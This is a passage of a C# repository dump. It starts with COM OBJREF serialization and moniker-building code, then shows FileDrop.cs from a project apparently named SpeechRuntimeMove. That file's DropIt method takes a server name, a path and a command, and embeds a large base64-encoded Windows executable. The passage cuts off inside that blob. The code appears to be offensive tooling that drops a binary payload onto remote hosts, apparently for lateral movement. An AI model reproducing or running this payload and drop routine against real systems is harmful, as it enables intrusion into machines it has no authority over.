 853 |                 BinaryWriter new_writer = new BinaryWriter(stm);
 854 |                 if (StringBindings.Count > 0)
 855 |                 {
 856 |                     foreach (COMStringBinding str in StringBindings)
 857 |                     {
 858 |                         str.ToWriter(new_writer);
 859 |                     }
 860 |                     new COMStringBinding().ToWriter(new_writer);
 861 |                 }
 862 |                 ushort ofs = (ushort)(stm.Position / 2);
 863 |                 if (SecurityBindings.Count > 0)
 864 |                 {
 865 |                     foreach (COMSecurityBinding sec in SecurityBindings)
 866 |                     {
 867 |                         sec.ToWriter(new_writer);
 868 |                     }
 869 |                     new COMSecurityBinding().ToWriter(new_writer);
 870 |                 }
 871 |                 writer.Write((ushort)(stm.Length / 2));
 872 |                 writer.Write(ofs);
 873 |                 writer.Write(stm.ToArray());
 874 |             }
 875 | 
 876 |             internal COMDualStringArray Clone()
 877 |             {
 878 |                 COMDualStringArray ret = new COMDualStringArray();
 879 |                 ret.StringBindings.AddRange(StringBindings.Select(b => b.Clone()));
 880 |                 ret.SecurityBindings.AddRange(SecurityBindings.Select(b => b.Clone()));
 881 |                 return ret;
 882 |             }
 883 |         }
 884 | 
 885 |         public abstract class COMObjRef
 886 |         {
 887 |             public const int OBJREF_MAGIC = 0x574f454d;
 888 | 
 889 |             public Guid Iid { get; set; }
 890 | 
 891 |             public COMObjrefFlags Flags
 892 |             {
 893 |                 get
 894 |                 {
 895 |                     if (this is COMObjRefCustom)
 896 |                     {
 897 |                         return COMObjrefFlags.Custom;
 898 |                     }
 899 |                     else if (this is COMObjRefHandler)
 900 |                     {
 901 |                         return COMObjrefFlags.Handler;
 902 |                     }
 903 |                     else if (this is COMObjRefStandard)
 904 |                     {
 905 |                         return COMObjrefFlags.Standard;
 906 |                     }
 907 |                     else
 908 |                     {
 909 |                         return COMObjrefFlags.None;
 910 |                     }
 911 |                 }
 912 |             }
 913 | 
 914 |             public byte[] ToArray()
 915 |             {
 916 |                 MemoryStream stm = new MemoryStream();
 917 |                 BinaryWriter writer = new BinaryWriter(stm);
 918 |                 writer.Write(OBJREF_MAGIC);
 919 |                 writer.Write((int)Flags);
 920 |                 writer.Write(Iid);
 921 |                 Serialize(writer);
 922 |                 return stm.ToArray();
 923 |             }
 924 | 
 925 |             public string ToMoniker()
 926 |             {
 927 |                 return $"objref:{Convert.ToBase64String(ToArray())}:";
 928 |             }
 929 | 
 930 |             protected abstract void Serialize(BinaryWriter writer);
 931 | 
 932 |             protected COMObjRef(Guid iid)
 933 |             {
 934 |                 Iid = iid;
 935 |             }
 936 | 
 937 |             public static COMObjRef FromArray(byte[] arr)
 938 |             {
 939 |                 MemoryStream stm = new MemoryStream(arr);
 940 |                 BinaryReader reader = new BinaryReader(stm);
 941 |                 int magic = reader.ReadInt32();
 942 |                 if (magic != OBJREF_MAGIC)
 943 |                 {
 944 |                     throw new ArgumentException("Invalid OBJREF Magic");
 945 |                 }
 946 | 
 947 |                 COMObjrefFlags flags = (COMObjrefFlags)reader.ReadInt32();
 948 |                 Guid iid = reader.ReadGuid();
 949 |                 switch (flags)
 950 |                 {
 951 |                     case COMObjrefFlags.Custom:
 952 |                         return new COMObjRefCustom(reader, iid);
 953 | 
 954 |                     case COMObjrefFlags.Standard:
 955 |                         return new COMObjRefStandard(reader, iid);
 956 | 
 957 |                     case COMObjrefFlags.Handler:
 958 |                         return new COMObjRefHandler(reader, iid);
 959 | 
 960 |                     case COMObjrefFlags.Extended:
 961 |                     default:
 962 |                         throw new ArgumentException("Invalid OBJREF Type Flags");
 963 |                 }
 964 |             }
 965 |         }
 966 | 
 967 |         public class COMObjRefCustom : COMObjRef
 968 |         {
 969 |             public Guid Clsid { get; set; }
 970 |             public int Reserved { get; set; }
 971 |             public byte[] ExtensionData { get; set; }
 972 |             public byte[] ObjectData { get; set; }
 973 | 
 974 |             //public COMObjRefCustom()
 975 |             //    : base(COMInterfaceEntry.IID_IUnknown)
 976 |             //{
 977 |             //    ObjectData = new byte[0];
 978 |             //    ExtensionData = new byte[0];
 979 |             //}
 980 | 
 981 |             internal COMObjRefCustom(BinaryReader reader, Guid iid)
 982 |                 : base(iid)
 983 |             {
 984 |                 Clsid = reader.ReadGuid();
 985 |                 // Size of extension data but can be 0.
 986 |                 int extension = reader.ReadInt32();
 987 |                 ExtensionData = new byte[extension];
 988 |                 Reserved = reader.ReadInt32();
 989 |                 if (extension > 0)
 990 |                 {
 991 |                     ExtensionData = reader.ReadAll(extension);
 992 |                 }
 993 |                 // Read to end of stream.
 994 |                 ObjectData = reader.ReadBytes((int)(reader.BaseStream.Length - reader.BaseStream.Position));
 995 |             }
 996 | 
 997 |             protected override void Serialize(BinaryWriter writer)
 998 |             {
 999 |                 writer.Write(Clsid);
1000 |                 writer.Write(ExtensionData.Length);
1001 |                 writer.Write(Reserved);
1002 |                 writer.Write(ExtensionData);
1003 |                 writer.Write(ObjectData);
1004 |             }
1005 |         }
1006 | 
1007 |         [Flags]
1008 |         public enum COMStdObjRefFlags
1009 |         {
1010 |             None = 0,
1011 |             NoPing = 0x1000
1012 |         }
1013 | 
1014 |         internal class COMStdObjRef
1015 |         {
1016 |             public COMStdObjRefFlags StdFlags { get; set; }
1017 |             public int PublicRefs { get; set; }
1018 |             public ulong Oxid { get; set; }
1019 |             public ulong Oid { get; set; }
1020 |             public Guid Ipid { get; set; }
1021 | 
1022 |             public COMStdObjRef()
1023 |             {
1024 |             }
1025 | 
1026 |             internal COMStdObjRef(BinaryReader reader)
1027 |             {
1028 |                 StdFlags = (COMStdObjRefFlags)reader.ReadInt32();
1029 |                 PublicRefs = reader.ReadInt32();
1030 |                 Oxid = reader.ReadUInt64();
1031 |                 Oid = reader.ReadUInt64();
1032 |                 Ipid = reader.ReadGuid();
1033 |             }
1034 | 
1035 |             public void ToWriter(BinaryWriter writer)
1036 |             {
1037 |                 writer.Write((int)StdFlags);
1038 |                 writer.Write(PublicRefs);
1039 |                 writer.Write(Oxid);
1040 |                 writer.Write(Oid);
1041 |                 writer.Write(Ipid);
1042 |             }
1043 | 
1044 |             internal COMStdObjRef Clone()
1045 |             {
1046 |                 return (COMStdObjRef)MemberwiseClone();
1047 |             }
1048 |         }
1049 | 
1050 |         public class COMObjRefStandard : COMObjRef
1051 |         {
1052 |             internal COMStdObjRef _stdobjref;
1053 |             internal COMDualStringArray _stringarray;
1054 | 
1055 |             public COMStdObjRefFlags StdFlags { get => _stdobjref.StdFlags; set => _stdobjref.StdFlags = value; }
1056 |             public int PublicRefs { get => _stdobjref.PublicRefs; set => _stdobjref.PublicRefs = value; }
1057 |             public ulong Oxid { get => _stdobjref.Oxid; set => _stdobjref.Oxid = value; }
1058 |             public ulong Oid { get => _stdobjref.Oid; set => _stdobjref.Oid = value; }
1059 |             public Guid Ipid { get => _stdobjref.Ipid; set => _stdobjref.Ipid = value; }
1060 | 
1061 |             public List<COMStringBinding> StringBindings => _stringarray.StringBindings;
1062 |             public List<COMSecurityBinding> SecurityBindings => _stringarray.SecurityBindings;
1063 | 
1064 |             public int ProcessId => COMUtilities.GetProcessIdFromIPid(Ipid);
1065 | 
1066 |             public string ProcessName => COMUtilities.GetProcessNameById(ProcessId);
1067 | 
1068 |             public int ApartmentId => COMUtilities.GetApartmentIdFromIPid(Ipid);
1069 |             public string ApartmentName => COMUtilities.GetApartmentIdStringFromIPid(Ipid);
1070 | 
1071 |             internal COMObjRefStandard(BinaryReader reader, Guid iid)
1072 |                 : base(iid)
1073 |             {
1074 |                 _stdobjref = new COMStdObjRef(reader);
1075 |                 _stringarray = new COMDualStringArray(reader);
1076 |             }
1077 | 
1078 |             protected COMObjRefStandard(Guid iid) : base(iid)
1079 |             {
1080 |             }
1081 | 
1082 |             protected COMObjRefStandard(COMObjRefStandard std) : base(std.Iid)
1083 |             {
1084 |                 _stdobjref = std._stdobjref.Clone();
1085 |                 _stringarray = std._stringarray.Clone();
1086 |             }
1087 | 
1088 |             public COMObjRefStandard() : base(Guid.Empty)
1089 |             {
1090 |                 _stdobjref = new COMStdObjRef();
1091 |                 _stringarray = new COMDualStringArray();
1092 |             }
1093 | 
1094 |             protected override void Serialize(BinaryWriter writer)
1095 |             {
1096 |                 _stdobjref.ToWriter(writer);
1097 |                 _stringarray.ToWriter(writer);
1098 |             }
1099 | 
1100 |             public COMObjRefHandler ToHandler(Guid clsid)
1101 |             {
1102 |                 return new COMObjRefHandler(clsid, this);
1103 |             }
1104 |         }
1105 | 
1106 |         public class COMObjRefHandler : COMObjRefStandard
1107 |         {
1108 |             public Guid Clsid { get; set; }
1109 | 
1110 |             internal COMObjRefHandler(BinaryReader reader, Guid iid)
1111 |                 : base(iid)
1112 |             {
1113 |                 _stdobjref = new COMStdObjRef(reader);
1114 |                 Clsid = reader.ReadGuid();
1115 |                 _stringarray = new COMDualStringArray(reader);
1116 |             }
1117 | 
1118 |             internal COMObjRefHandler(Guid clsid, COMObjRefStandard std) : base(std)
1119 |             {
1120 |                 Clsid = clsid;
1121 |             }
1122 | 
1123 |             public COMObjRefHandler() : base()
1124 |             {
1125 |             }
1126 | 
1127 |             protected override void Serialize(BinaryWriter writer)
1128 |             {
1129 |                 _stdobjref.ToWriter(writer);
1130 |                 writer.Write(Clsid);
1131 |                 _stringarray.ToWriter(writer);
1132 |             }
1133 |         }
1134 | 
1135 |        
1136 | 
1137 |     }
1138 | }
1139 | 


--------------------------------------------------------------------------------
/SpeechRuntimeMove/FileDrop.cs:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.Collections.Generic;
  3 | using System.Linq;
  4 | using System.Text;
  5 | using System.Threading.Tasks;
  6 | using System.IO;
  7 | using System.Runtime.InteropServices;
  8 | 
  9 | namespace SpeechRuntimeMove
 10 | {
 11 |     internal class FileDrop
 12 |     {
 13 |         public static bool DropIt(string serverName, string path, string command)
 14 |         {
 15 |             try
 16 |             {
 17 |                 string base64Content = "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